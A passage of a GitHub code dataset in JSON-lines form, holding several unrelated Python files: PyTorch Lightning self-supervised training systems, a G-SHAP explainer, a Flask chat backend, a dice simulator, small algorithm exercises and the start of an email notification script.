dim=1)) / 2.\n indices = emb_dict['indices']\n self.memory_bank.update(indices, outputs_avg)\n else:\n raise Exception(f'Objective {self.loss_name} is not supported.')\n\n return loss\n\n def configure_optimizers(self):\n encoder_params = self.model.parameters()\n\n if self.config.optim_params.adam:\n optim = torch.optim.AdamW(encoder_params)\n else:\n optim = torch.optim.SGD(\n 
encoder_params,\n lr=self.config.optim_params.learning_rate,\n momentum=self.config.optim_params.momentum,\n weight_decay=self.config.optim_params.weight_decay,\n )\n return [optim], []\n\n def training_step(self, batch, batch_idx):\n emb_dict = {}\n indices, img, img2, neg_img, labels, = batch\n if self.loss_name == 'nce':\n emb_dict['img_embs_1'] = self.forward(img)\n elif 'simclr' in self.loss_name:\n emb_dict['img_embs_1'] = self.forward(img)\n emb_dict['img_embs_2'] = self.forward(img2)\n\n emb_dict['indices'] = indices\n emb_dict['labels'] = labels\n return emb_dict\n\n def training_step_end(self, emb_dict):\n loss = self.get_losses_for_batch(emb_dict, train=True)\n metrics = {'loss': loss, 'temperature': self.t}\n return {'loss': loss, 'log': metrics}\n \n def validation_step(self, batch, batch_idx):\n emb_dict = {}\n indices, img, img2, neg_img, labels, = batch\n if self.loss_name == 'nce':\n emb_dict['img_embs_1'] = self.forward(img)\n elif 'simclr' in self.loss_name:\n emb_dict['img_embs_1'] = self.forward(img)\n emb_dict['img_embs_2'] = self.forward(img2)\n\n emb_dict['indices'] = indices\n emb_dict['labels'] = labels\n img_embs = emb_dict['img_embs_1']\n \n loss = self.get_losses_for_batch(emb_dict, train=False)\n\n num_correct, batch_size = self.get_nearest_neighbor_label(img_embs, labels)\n output = OrderedDict({\n 'val_loss': loss,\n 'val_num_correct': torch.tensor(num_correct, dtype=float, device=self.device),\n 'val_num_total': torch.tensor(batch_size, dtype=float, device=self.device),\n })\n return output\n\n\nclass TransferViewMakerSystem(pl.LightningModule):\n '''Pytorch Lightning System for linear evaluation of self-supervised \n pretraining with adversarially generated views.\n '''\n\n def __init__(self, config):\n super().__init__()\n self.config = config\n self.batch_size = config.optim_params.batch_size\n self.encoder, self.viewmaker, self.system, self.pretrain_config = self.load_pretrained_model()\n resnet = self.pretrain_config.model_params.resnet_version\n \n if resnet == 'resnet18':\n if self.config.model_params.use_prepool:\n if self.pretrain_config.model_params.resnet_small:\n num_features = 512 * 4 * 4\n else:\n num_features = 512 * 7 * 7\n else:\n num_features = 512\n else:\n raise Exception(f'resnet {resnet} not supported.')\n self.train_dataset, self.val_dataset = datasets.get_image_datasets(\n config.data_params.dataset,\n default_augmentations=self.pretrain_config.data_params.default_augmentations or False,\n )\n if not self.pretrain_config.model_params.resnet_small:\n self.encoder = nn.Sequential(*list(self.encoder.children())[:-1]) # keep pooling layer\n\n self.encoder = self.encoder.eval()\n self.viewmaker = self.viewmaker.eval()\n # linear evaluation freezes pretrained weights\n utils.frozen_params(self.encoder)\n utils.frozen_params(self.viewmaker)\n\n self.num_features = num_features\n self.model = self.create_model()\n\n def load_pretrained_model(self):\n base_dir = self.config.pretrain_model.exp_dir\n checkpoint_name = self.config.pretrain_model.checkpoint_name\n\n config_path = os.path.join(base_dir, 'config.json')\n config_json = utils.load_json(config_path)\n config = DotMap(config_json)\n \n if self.config.model_params.resnet_small:\n config.model_params.resnet_small = self.config.model_params.resnet_small\n\n SystemClass = globals()[config.system]\n system = SystemClass(config)\n checkpoint_file = os.path.join(base_dir, 'checkpoints', checkpoint_name)\n checkpoint = torch.load(checkpoint_file, map_location=self.device)\n 
system.load_state_dict(checkpoint['state_dict'], strict=False)\n\n encoder = system.model.eval()\n viewmaker = system.viewmaker.eval()\n\n return encoder, viewmaker, system, system.config\n\n def create_model(self):\n num_class = self.train_dataset.NUM_CLASSES\n model = LogisticRegression(self.num_features, num_class)\n return model\n\n def noise(self, batch_size):\n shape = (batch_size, self.pretrain_config.model_params.noise_dim)\n # Center noise at 0 then project to unit sphere.\n noise = utils.l2_normalize(torch.rand(shape) - 0.5)\n return noise\n\n def forward(self, img, valid=False):\n batch_size = img.size(0)\n if self.pretrain_config.data_params.spectral_domain:\n img = self.system.normalize(img)\n img = dct.dct_2d(img)\n img = (img - img.mean()) / img.std()\n if not valid and not self.config.optim_params.no_views: \n img = self.viewmaker(img)\n if type(img) == tuple:\n idx = random.randint(0, 1)\n img = img[idx]\n if 'Expert' not in self.pretrain_config.system and not self.pretrain_config.data_params.spectral_domain:\n img = self.system.normalize(img)\n if self.pretrain_config.model_params.resnet_small:\n if self.config.model_params.use_prepool:\n embs = self.encoder(img, layer=5)\n else:\n embs = self.encoder(img, layer=6)\n else:\n embs = self.encoder(img)\n return self.model(embs.view(batch_size, -1))\n\n def get_losses_for_batch(self, batch, valid=False):\n _, img, _, _, label = batch\n logits = self.forward(img, valid)\n if self.train_dataset.MULTI_LABEL:\n return F.binary_cross_entropy(torch.sigmoid(logits).view(-1), \n label.view(-1).float())\n else:\n return F.cross_entropy(logits, label)\n\n def get_accuracies_for_batch(self, batch, valid=False):\n _, img, _, _, label = batch\n batch_size = img.size(0)\n logits = self.forward(img, valid)\n if self.train_dataset.MULTI_LABEL:\n preds = torch.round(torch.sigmoid(logits))\n preds = preds.long().cpu()\n num_correct = torch.sum(preds.cpu() == label.cpu(), dim=0)\n num_correct = num_correct.detach().cpu().numpy()\n num_total = batch_size\n return num_correct, num_total, preds, label.cpu()\n else:\n preds = torch.argmax(F.log_softmax(logits, dim=1), dim=1)\n preds = preds.long().cpu()\n num_correct = torch.sum(preds == label.long().cpu()).item()\n num_total = batch_size\n return num_correct, num_total\n\n def training_step(self, batch, batch_idx):\n loss = self.get_losses_for_batch(batch)\n with torch.no_grad():\n if self.train_dataset.MULTI_LABEL:\n num_correct, num_total, _, _ = self.get_accuracies_for_batch(batch)\n num_correct = num_correct.mean()\n else:\n num_correct, num_total = self.get_accuracies_for_batch(batch)\n metrics = {\n 'train_loss': loss,\n 'train_num_correct': torch.tensor(num_correct, dtype=float, device=self.device),\n 'train_num_total': torch.tensor(num_total, dtype=float, device=self.device),\n 'train_acc': torch.tensor(num_correct / float(num_total), dtype=float, device=self.device)\n }\n return {'loss': loss, 'log': metrics}\n\n def validation_step(self, batch, batch_idx):\n loss = self.get_losses_for_batch(batch, valid=True)\n if self.train_dataset.MULTI_LABEL: # regardless if binary or not\n num_correct, num_total, val_preds, val_labels = \\\n self.get_accuracies_for_batch(batch, valid=True)\n return OrderedDict({\n 'val_loss': loss,\n 'val_num_correct': torch.tensor(num_correct, dtype=float, device=self.device),\n 'val_num_total': torch.tensor(num_total, dtype=float, device=self.device),\n 'val_acc': torch.tensor(num_correct / float(num_total), dtype=float, device=self.device),\n 'val_pred_labels': 
val_preds.float(),\n 'val_true_labels': val_labels.float(),\n })\n else:\n num_correct, num_total = self.get_accuracies_for_batch(batch, valid=True)\n return OrderedDict({\n 'val_loss': loss,\n 'val_num_correct': torch.tensor(num_correct, dtype=float, device=self.device),\n 'val_num_total': torch.tensor(num_total, dtype=float, device=self.device),\n 'val_acc': torch.tensor(num_correct / float(num_total), dtype=float, device=self.device),\n })\n\n def validation_epoch_end(self, outputs):\n metrics = {}\n for key in outputs[0].keys():\n try:\n metrics[key] = torch.tensor([elem[key] for elem in outputs]).float().mean()\n except:\n pass\n \n if self.train_dataset.MULTI_LABEL:\n num_correct = torch.stack([out['val_num_correct'] for out in outputs], dim=1).sum(1)\n num_total = torch.stack([out['val_num_total'] for out in outputs]).sum()\n val_acc = num_correct / float(num_total)\n metrics['val_acc'] = val_acc.mean()\n progress_bar = {'acc': val_acc.mean()}\n num_class = self.train_dataset.NUM_CLASSES\n for c in range(num_class):\n val_acc_c = num_correct[c] / float(num_total)\n metrics[f'val_acc_feat{c}'] = val_acc_c\n val_pred_labels = torch.cat([out['val_pred_labels'] for out in outputs], dim=0).numpy()\n val_true_labels = torch.cat([out['val_true_labels'] for out in outputs], dim=0).numpy()\n \n val_f1 = 0\n for c in range(num_class):\n val_f1_c = f1_score(val_true_labels[:, c], val_pred_labels[:, c])\n metrics[f'val_f1_feat{c}'] = val_f1_c\n val_f1 = val_f1 + val_f1_c\n val_f1 = val_f1 / float(num_class)\n metrics['val_f1'] = val_f1\n progress_bar['f1'] = val_f1\n return {'val_loss': metrics['val_loss'], \n 'log': metrics,\n 'val_acc': val_acc, \n 'val_f1': val_f1,\n 'progress_bar': progress_bar}\n else:\n num_correct = sum([out['val_num_correct'] for out in outputs])\n num_total = sum([out['val_num_total'] for out in outputs])\n val_acc = num_correct / float(num_total)\n metrics['val_acc'] = val_acc\n progress_bar = {'acc': val_acc}\n return {'val_loss': metrics['val_loss'], \n 'log': metrics, \n 'val_acc': val_acc,\n 'progress_bar': progress_bar}\n\n def configure_optimizers(self):\n params_iterator = self.model.parameters()\n if self.config.optim_params == 'adam':\n optim = torch.optim.Adam(params_iterator)\n else:\n optim = torch.optim.SGD(\n params_iterator,\n lr=self.config.optim_params.learning_rate,\n momentum=self.config.optim_params.momentum,\n weight_decay=self.config.optim_params.weight_decay,\n )\n return [optim], []\n\n def train_dataloader(self):\n return create_dataloader(self.train_dataset, self.config, self.batch_size)\n\n def val_dataloader(self):\n return create_dataloader(self.val_dataset, self.config, self.batch_size, \n shuffle=False, drop_last=False)\n\n\nclass TransferExpertSystem(TransferViewMakerSystem):\n\n def __init__(self, config):\n super(TransferViewMakerSystem, self).__init__()\n self.config = config\n self.batch_size = config.optim_params.batch_size\n \n self.encoder, self.pretrain_config = self.load_pretrained_model()\n resnet = self.pretrain_config.model_params.resnet_version\n if resnet == 'resnet18':\n if self.config.model_params.use_prepool:\n if self.pretrain_config.model_params.resnet_small:\n num_features = 512 * 4 * 4\n else:\n num_features = 512 * 7 * 7\n else:\n num_features = 512\n else:\n raise Exception(f'resnet {resnet} not supported.')\n\n if not self.pretrain_config.model_params.resnet_small:\n self.encoder = nn.Sequential(*list(self.encoder.children())[:-1]) # keep pooling layer\n \n # Freeze encoder for linear evaluation.\n self.encoder = 
self.encoder.eval()\n utils.frozen_params(self.encoder)\n\n default_augmentations = self.pretrain_config.data_params.default_augmentations\n if self.config.data_params.force_default_views or default_augmentations == DotMap():\n default_augmentations = 'all'\n self.train_dataset, self.val_dataset = datasets.get_image_datasets(\n config.data_params.dataset,\n default_augmentations=default_augmentations,\n )\n self.num_features = num_features\n self.model = self.create_model()\n\n def load_pretrained_model(self):\n base_dir = self.config.pretrain_model.exp_dir\n checkpoint_name = self.config.pretrain_model.checkpoint_name\n\n config_path = os.path.join(base_dir, 'config.json')\n config_json = utils.load_json(config_path)\n config = DotMap(config_json)\n\n if self.config.model_params.resnet_small:\n config.model_params.resnet_small = self.config.model_params.resnet_small\n\n SystemClass = globals()[config.system]\n system = SystemClass(config)\n checkpoint_file = os.path.join(base_dir, 'checkpoints', checkpoint_name)\n checkpoint = torch.load(checkpoint_file, map_location=self.device)\n system.load_state_dict(checkpoint['state_dict'], strict=False)\n\n encoder = system.model.eval()\n return encoder, config\n\n def forward(self, img, unused_valid=None):\n del unused_valid\n batch_size = img.size(0)\n if self.pretrain_config.model_params.resnet_small:\n if self.config.model_params.use_prepool:\n embs = self.encoder(img, layer=5)\n else:\n embs = self.encoder(img, layer=6)\n else:\n embs = self.encoder(img)\n return self.model(embs.view(batch_size, -1))\n","repo_name":"alextamkin/viewmaker","sub_path":"src/systems/image_systems.py","file_name":"image_systems.py","file_ext":"py","file_size_in_byte":31597,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"99"} +{"seq_id":"13447199680","text":"class Node:\n def __init__(self,val,next):\n self.val = val\n self.next = None\n\n\nclass Solution:\n def FindKthToTail(self, head, k):\n front = head\n last = head\n\n for i in range(k):\n if front == None:\n return\n elif front == None and i == k:\n return head\n front = front.next\n\n\n while front.next != None:\n front = front.next\n last = last.next\n\n\n return last.next\n\n\n\nif __name__ == \"__main__\":\n solution = Solution()\n\n node3 = Node(3, None)\n node2 = Node(2,node3)\n node1 = Node(1, node2)\n solution.FindKthToTail(node1,1)\n\n\n\n\n\"\"\"\n\n网上思路:\n代码思路如下:两个指针,先让第一个指针和第二个指针都指向头结点,\n然后再让第一个指正走(k-1)步,到达第k个节点。然后两个指针同时往后移动,\n当第一个结点到达末尾的时候,第二个结点所在位置就是倒数第k个节点了。。\n0 k len-k len\n len-k k len\n\"\"\"","repo_name":"Nexnull/Leetcoding","sub_path":"leetcode/Array/two pointers/19.链表中倒数第k个结点.py","file_name":"19.链表中倒数第k个结点.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"11008709252","text":"#Wrtie an application to simulate the rolling of two dice. The app should use an object of class Random once to roll the first die \n#and again to roll the second die. The sum of the two values should then be caluculated.\n#Each die can show an integer value from 1 to 6, so the sum of the values will vary from 2 to 12, \n#with 7 being the most frequent sum and 2 and 12 being the least frequent sums. \n#The Figure shows the 36 possible combinations of the two dice. Your app should roll the dice 36000 times.\n#Use a one dimensional array ti keep trck of the number of times each possible sum appears. \n#Display the result in a tabular format. 
determine whether the totals are reasonable \n#(e.g., there are six ways to roll a 7, so approximately one-sixth of the rolls should be 7).\n\n# 1 2 3 4 5 6\n# 1 2 3 4 5 6 7\n# 2 3 4 5 6 7 8\n# 3 4 5 6 7 8 9\n# 4 5 6 7 8 9 10\n# 5 6 7 8 9 10 11\n# 6 7 8 9 10 11 12\n\n#Hints:\n#1-Keep track of how many times each total(2 through 12) occurs. This total is used to calculate the percentage of the time that each total occurs.\n#2-Define a loop that iterates 36,000 times. during each iteration, roll the dice, \n#calculate the total and update the count for the particular total in the array.\n#3-create an array large enough that you can use the sum of the dice as the index into the array.\n#4-Your output should appear as follows:\n# sum frequency percentage\n# 2 1027 2.85\n# 3 2030 5.64\n# 4 2931 8.14\n# 5 3984 11.07\n# 6 5035 13.99\n# 7 5996 16.66\n# 8 4992 13.87\n# 9 4047 11.24\n# 10 2961 8.23\n# 11 1984 5.51\n# 12 1013 2.81\n\n\nimport random\n\ncounter=0\nfrequency = {2:0,3:0,4:0,5:0,6:0,7:0,8:0,9:0,10:0,11:0,12:0}\npercentage = {}\ntotal_frequency=0\ntotal_pecentage=0\n\n#find frequency of occurange for each sum of dice\nwhile counter < 3600:\n\tdice_1=random.randrange(1,7,1)\n\tdice_2=random.randrange(1,7,1)\n\tsum = dice_1 + dice_2\n\n\tif sum in frequency:\n\t\tfrequency[sum] = frequency[sum]+ 1\n\telse:\n\t frequency[sum] = 1\n\tcounter+=1\n\n#find percenatage of occurrance for each frequency\nfor i in frequency:\n\tcaluclate_percentage = (frequency[i]/3600)*100\n\tformated_percentage = round(caluclate_percentage,3)\n\tpercentage[i] = formated_percentage\n\n\n#print result\n#print header\nprint(\"sum \"+ \" frequency \" + \" percentage \")\nfor i in range(2,13):\n\tprint(\" \" + str(i) + \" \"+ str(frequency[i]) + \" \" + str(percentage[i]))\n\ttotal_frequency = total_frequency + frequency[i]\n\ttotal_pecentage = total_pecentage + percentage[i]\n#print totals \nprint(\"total \", str(total_frequency) + \" \" + str(total_pecentage)) \n\n\n","repo_name":"moast/python_awesome_scripts","sub_path":"Roll_Dice_Sum.py","file_name":"Roll_Dice_Sum.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74293116485","text":"\"\"\"# Kernel Explainer\"\"\"\n\nfrom gshap.utils import get_columns, get_data\n\nfrom random import choices, shuffle\nimport numpy as np\nimport pandas as pd\n\n\nclass KernelExplainer():\n \"\"\"\n The Kernel Explainer is a model-agnostic method of approximating G-SHAP \n values.\n\n Parameters\n ----------\n model : callable\n Callable which takes a (# observations, # features) matrix and returns\n an output which will be fed into `g`. For ordinary SHAP, the model \n returns a (# observations, # targets) output vector.\n \n data : numpy.array or pandas.DataFrame or pandas.Series\n Background dataset from which values are randomly sampled to simulate \n absent features.\n\n g : callable, default=lambda x: x.mean()\n Callable which takes the `model` output and returns a scalar. Defaults\n to the mean of the output, which is the classical SHAP value.\n\n Attributes\n ----------\n model : callable\n Set from the `model` parameter.\n\n data : numpy.array\n Set from the `data` parameter. 
If `data` is a `pandas` object, it is \n automatically converted to a `numpy.array`.\n\n g : callable\n Set from the `g` parameter.\n\n Examples\n --------\n This example shows how to compute classical SHAP values.\n ```python\n import gshap\n \n from sklearn.datasets import load_boston\n from sklearn.linear_model import LinearRegression\n\n X, y = load_boston(return_X_y=True)\n reg = LinearRegression().fit(X,y)\n explainer = gshap.KernelExplainer(\n \\ model=reg.predict, data=X, g=lambda x: x.mean()\n )\n explainer.gshap_values(X, nsamples=1000)\n ```\n\n Out:\n\n ```\n array([-8.52873964e-04, -4.90442234e-04, 9.42836482e-05, 3.98231297e-04,\n \\ 2.03149964e-03, 3.93086231e-03, -7.38176865e-06, 3.81400727e-03,\n \\ 5.19437337e-03, -1.34661588e-03, 7.08535145e-04, 1.50486721e-03,\n \\ -8.28480438e-03])\n ```\n\n As expected, all SHAP values are 0 for linear regression. We can see this \n when we compare the mean prediction for the original data `X` to the \n shuffled background data `explainer.data`.\n\n ```python\n explainer.compare(X, bootstrap_samples=1000)\n ```\n\n Out:\n\n ```\n 22.53280632411067, 22.52089950825812\n ```\n \"\"\"\n def __init__(self, model, data, g=lambda x: x.mean()):\n self.model = model\n self.data = data\n self.g = g\n\n @property\n def data(self):\n return self._data\n\n @data.setter\n def data(self, X):\n self._data = (\n X.values if isinstance(X, (pd.DataFrame, pd.Series)) else X\n )\n self.N, self.P = self._data.shape\n\n @property\n def nsamples(self):\n \"\"\"Default number of samples to draw to approximate G-SHAP values\"\"\"\n return 2 * self.P + 2**11\n\n def compare(self, X, bootstrap_samples=1000):\n \"\"\"\n Compares the background data `self.data` to the comparison data `X` \n in terms of the general function `self.g`.\n\n Parameters\n ----------\n X : numpy.array or pandas.Series or pandas.DataFrame\n (# samples, # features) matrix of comparison data.\n\n bootstrap_samples : int, default=1000\n Number of bootstrapped samples for computing `g` of the \n background data.\n\n Returns\n -------\n g_comparison : float\n *g(model(X))*, where *X* is the comparison data.\n\n g_background : float\n *g(model(X_b))*, where *X_b* is the shuffled background data.\n \"\"\"\n def compute_g_background():\n sample = np.array(choices(self.data, k=X.shape[0]))\n if columns is not None:\n sample = pd.DataFrame(columns=columns, data=sample)\n return self.g(self.model(sample))\n\n columns = get_columns(X)\n X = X.to_frame().T if isinstance(X, pd.Series) else X\n g_data = [compute_g_background() for _ in range(bootstrap_samples)]\n return self.g(self.model(X)), sum(g_data) / len(g_data)\n \n def gshap_values(self, X, **kwargs):\n \"\"\"\n Compute G-SHAP values for all features.\n\n Parameters\n ----------\n X : numpy.array or pandas.DataFrame or pandas.Series\n A (# samples, # features) matrix.\n\n nsamples : scalar or 'auto', default='auto'\n Number of samples to draw when approximating G-SHAP values.\n\n Returns\n -------\n gshap_values : np.array\n (# features,) vector of G-SHAP values ordered by feature index.\n \"\"\"\n return np.array(\n [self.gshap_value(j, X, **kwargs) for j in range(self.P)]\n )\n\n def gshap_value(self, j, X, **kwargs):\n \"\"\"\n Compute the G-SHAP value for feature `j`.\n\n Parameters\n ----------\n j : scalar or column name\n The index or column name of the feature of interest.\n\n X : numpy.array or pandas.DataFrame or pandas.Series\n A (# samples, # features) matrix.\n\n nsamples : scalar or 'auto', default='auto'\n Number of samples to 
draw when approximating G-SHAP values.\n\n Returns\n -------\n gshap_value : float\n Approximated G-SHAP value for feature `j` (float).\n \"\"\"\n j = list(X.columns).index(j) if isinstance(j, str) else j\n nsamples = kwargs.get('nsamples', self.nsamples)\n phi = [self._compute_phi(j, X) for m in range(nsamples)]\n return sum(phi) / len(phi)\n\n def _compute_phi(self, j, X):\n \"\"\"Approximate G-SHAP value for feature `j` for one sample\n \n This method approximates the G-SHAP value by Monte Carlo sampling.\n 1. Construct `Z` by sampling observations from the background dataset.\n 2. Shuffle the order of the features.\n 3. Construct `X_mj` (X minus the j'th feature) as all features from X \n which come before j. Absent features are filled in from `Z`.\n 4. Construct `X_pj` (X plus the j'th feature) by adding the original \n j'th feature from `X` to `X_mj`.\n 5. Return phi = g(model(X_pj)) - g(model(X_mj)).\n \"\"\"\n columns = get_columns(X)\n X = get_data(X)\n # Ensure feature dimension of X matches that of the background data\n assert X.shape[1] == self.P\n\n Z = np.array(choices(self.data, k=X.shape[0]))\n\n order = np.array(list(range(self.P)))\n np.random.shuffle(order)\n j_idx = order[j]\n\n X_mj = (\n (order < j_idx).astype(int) * X \n + (order >= j_idx).astype(int) * Z\n )\n X_pj = X_mj.copy()\n X_pj[:,j] = X[:,j]\n if columns is not None:\n X_mj = pd.DataFrame(columns=columns, data=X_mj)\n X_pj = pd.DataFrame(columns=columns, data=X_pj)\n\n return self.g(self.model(X_pj)) - self.g(self.model(X_mj))","repo_name":"dsbowen/gshap","sub_path":"gshap/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6892,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"99"} +{"seq_id":"18629291027","text":"from flask import Flask, request, jsonify\nfrom flask_restful import Api, Resource, reqparse, abort, fields, marshal_with\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom flask_cors import CORS, cross_origin\nfrom flask_socketio import SocketIO\nfrom flask_httpauth import HTTPBasicAuth\n\n\napplication = Flask(__name__)\nsocketio = SocketIO(application, cors_allowed_origins=\"*\")\ncors = CORS(application, resources={r\"/*\": {\"origins\": \"*\", \"supports_credentials\": True}})\n\n# app.config['CORS_HEADERS'] = 'Content-Type'\napi = Api(application)\napplication.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///database.db\"\napplication.config['SECRET_KEY'] = 'your_secret_key_here'\ndb = SQLAlchemy(application)\nmigrate = Migrate(application, db)\n\n\nfrom resources.UserResources import UserAll, UserById, UserByToken, UserLogIn, UserChatRooms, SignUp, FriendResource, UpdateProfilePicture, UpdateChatRooms, ProfilePictureResource\nfrom resources.GroupChatResources import GroupChatAll, GroupChatById, GroupChatAddUser, GroupChatMessages, RecentMessagesResource, OlderMessagesResource\nfrom resources.MessageResources import MessageResource\nfrom resources.MultimediaResources import MultimediaResource, MultimediaFile\nfrom resources.FriendRequestResources import FriendRequestResource\n\n# Routes\n# Users\napi.add_resource(UserAll, \"/all-users/\") \napi.add_resource(SignUp, \"/signup\")\napi.add_resource(UserByToken, \"/users/\")\napi.add_resource(UserById, \"/users/id/\")\napi.add_resource(UserLogIn, \"/users/login\")\napi.add_resource(UserChatRooms, \"/users/chatrooms\")\napi.add_resource(FriendResource, \"/friends\")\napi.add_resource(UpdateChatRooms, 
\"/users/update-chatrooms\")\napi.add_resource(UpdateProfilePicture, \"/update-profile-picture\")\napi.add_resource(ProfilePictureResource, \"/profile-picture/\")\n\n# Friend requests\napi.add_resource(FriendRequestResource, \"/friend_requests\")\n\n# Group Chats\napi.add_resource(GroupChatAll, \"/groupchats/\")\napi.add_resource(GroupChatById, \"/groupchats/\")\napi.add_resource(GroupChatAddUser, \"/groupchats//adduser\")\napi.add_resource(GroupChatMessages, '/groupchats//messages')\napi.add_resource(RecentMessagesResource, '/groupchats//recent-messages')\napi.add_resource(OlderMessagesResource, '/groupchats//older-messages/')\n\n# Messages\napi.add_resource(MessageResource, '/messages/')\n\n# Multimedia\napi.add_resource(MultimediaResource, '/messages//multimedia')\napi.add_resource(MultimediaFile, '/multimedia/')\n\n\nif __name__ == '__main__':\n socketio.run(application, host = '0.0.0.0', debug=True)","repo_name":"ignacio-urrutia/MyApp-backend","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"4163829447","text":"#\n# @author : SRvSaha\n# Filename : corpus_clean.py\n# Timestamp : 13:53 14-August-2016 (Sunday)\n# Description : SCRIPT to remove all punctuations with \" \" and removes all non-Malayalam stuffs\n# Requirement : Python 3\n#\n\nimport re\n\noutput = \"\"\nlines = []\nout = []\n\nwith open(\"TRY-1.txt\") as f:\n lines = f.readlines()\n\n\ndef corpus_clean(lines):\n global output # Since we want to use the global output\n for line in lines:\n string = \"\"\n # Only when it's when it is in the range of Malayalam Unicode and also\n # when space is there between words or the punctuations\n for i in line:\n if ord(i) >= ord('\\u0D00') and ord(i) <= ord('\\u0D7F') or ord(i) >= 32 and ord(i) <= 47 or ord(i) >= 58 and ord(i) <= 63:\n if ord(i) >= 33 and ord(i) <= 47 or ord(i) >= 58 and ord(i) <= 63:\n i = \" \" # Remove all punctuations with \" \"\n string += i\n string = re.sub(' +',' ',string) # Removing two or more spaces with single space\n if len(string) > 1: # Len = 1 when it's \" \"\n output += string + '\\n'\n with open(\"clean_output.txt\", 'w') as f:\n f.write(output)\n print(\"Operation Successful :)\")\n\nif __name__ == \"__main__\":\n corpus_clean(lines)\n","repo_name":"SRvSaha/Python_Automation_Scipts","sub_path":"corpus_clean.py","file_name":"corpus_clean.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"21449632285","text":"\"\"\"\n* Author: Mohamed Marzouk\n* -------------------------------------\n* Binary Heap Data Structure (Min Heap)\n* -------------------------------------\n* Time Complixty:\n * Building: O(N)\n * Inserting: O(log(N))\n * Peaking [first element]: Big Theta(1)\n * Polling [delete]: Big Theta(log(N))\n * Merging: Big Theta(N)\n* Used Language: Python\n* Usage:\n * Heap is used while implementing a priority queue.\n * Dijkstra’s Algorithm\n * Heap Sort\n\"\"\"\ndef heapify(arr, size, i):\n smallest = i;\n left = 2 * i + 1;\n right = 2 * i + 2;\n\n if left < size and arr[i] > arr[left]:\n smallest = left;\n if right < size and arr[smallest] > arr[right]:\n smallest = right\n if smallest != i:\n arr[i], arr[smallest] = arr[smallest], arr[i] # Swapping\n heapify(arr, size, smallest)\n\ndef insert(arr, num):\n size = len(arr)\n arr.append(num)\n if size != 0:\n for i in range(((len(arr) - 1) // 
2), -1, -1):\n heapify(arr, len(arr), i)\n\ndef deleteNode(arr, num):\n size = len(arr)\n for i in range(0, size):\n if arr[i] == num: break\n arr[i], arr[size - 1] = arr[size - 1], arr[i]\n arr.remove(arr[size - 1])\n for i in range(((len(arr) - 1) // 2), -1, -1):\n heapify(arr, len(arr), i)\n\narr = []\n\ninsert(arr, 3)\ninsert(arr, 4)\ninsert(arr, 9)\ninsert(arr, 5)\ninsert(arr, 2)\n\nprint (\"Min-Heap array: \" + str(arr))\n\"\"\"\n 2\n / \\\n 3 9\n /\\\n 5 4\n\"\"\"\n\ndeleteNode(arr, 2)\nprint(\"After deleting an element: \" + str(arr))\n\"\"\"\n 3\n / \\\n 4 9\n /\n 5\n\"\"\"\n","repo_name":"109-marzouk/Algorithms-and-Data-Structures","sub_path":"Data Structures/Heap.py","file_name":"Heap.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"27025805912","text":"def yes_or_not(message, result): # Verifica si la opción seleccionada es 's' o 'n' , e itera hasta que lo sea\n while result not in ('s', 'n'):\n result = input(message)\n if result == 'n' or result == 's' :\n return result \n \ndef insert_into_array(array, item): # inserta en un array sin duplicados\n into = False\n if len(array) > 0:\n for i in array:\n if i == item:\n into = True\n if into == False:\n array.append(item)\n return array\n \ndef get_enum_key(options,option,val): # retorna el nombre, dado el valor del enum. (Puede ser dado el acronimo o el precio)\n for opt in (options):\n if opt.value[val] == option:\n return opt.name\n \ndef give_options(format,title,options,duplicates): # Dato un enum, lista las opciones disponibles e itera hasta que la respuesta sea válida. Puede darse el caso de que retorne un valor numerico, o una lista con valores (no repetidos), dependiendo de los parámetros pasados\n print('\\n****** '+title+' : ******\\n')\n text = ''\n for option in (options):\n if format == 'inline':\n text = text + option.name + ' ('+option.value[0]+') '\n else:\n print('* '+text + option.name + ' ('+option.value[0]+') ')\n if format != 'inline':\n array = []\n print('\\n')\n text = 'Indique la opción (enter para terminar)' \n current_option = input(text+' : ')\n correct = False\n while True:\n if current_option == \"\":\n return array\n for option in (options):\n if option.value[0] == current_option:\n if format == 'inline':\n return get_enum_key(options,current_option,0)\n else:\n if duplicates == False:\n array = insert_into_array(array, get_enum_key(options,current_option,0))\n elif duplicates == True:\n array.append(get_enum_key(options,current_option,0))\n correct = True\n if correct == False:\n current_option = input(text + '. 
Por favor, indique una respuesta válida : ')\n else:\n current_option = input(text+ ' : ')\n correct = False\n","repo_name":"stephanie-cruz/MiniProyectoPython","sub_path":"utility_functions.py","file_name":"utility_functions.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"14861814191","text":"import re\nimport Configruation\nimport XmlReader\nfrom email.mime.text import MIMEText\nfrom email.utils import formataddr\nfrom email.header import Header\n# from email.mime.application import MIMEApplication\n# from email.mime.image import MIMEImage\nfrom email.mime.multipart import MIMEMultipart\nimport smtplib\naccount = Configruation.USERNAME + '@ericsson.com'\nsender = Configruation.EMAILSENDER #'jian.peng@ericsson.com'\nreceivers = Configruation.EMAILRECVIERS\npasswd = str(Configruation.USERPASSWORD,'utf-8')\nmailcontents = Configruation.EMAILSUJECT\nmailserver = 'se-smtp.ericsson.se'\nsub = 'Product Delivery Update Notify'\nxmlFileName = './DeliveryInformation.xml'\ntry:\n msg = MIMEMultipart('related')\n print('mail sender is :' + str(sender))\n msg['From'] = formataddr([\"sender\", sender])\n print('mail recvier list:'+ ','.join(receivers))\n msg['To'] = Header(\",\".join(receivers)) #formataddr([\"receiver\", receive])\n msg['Subject'] = 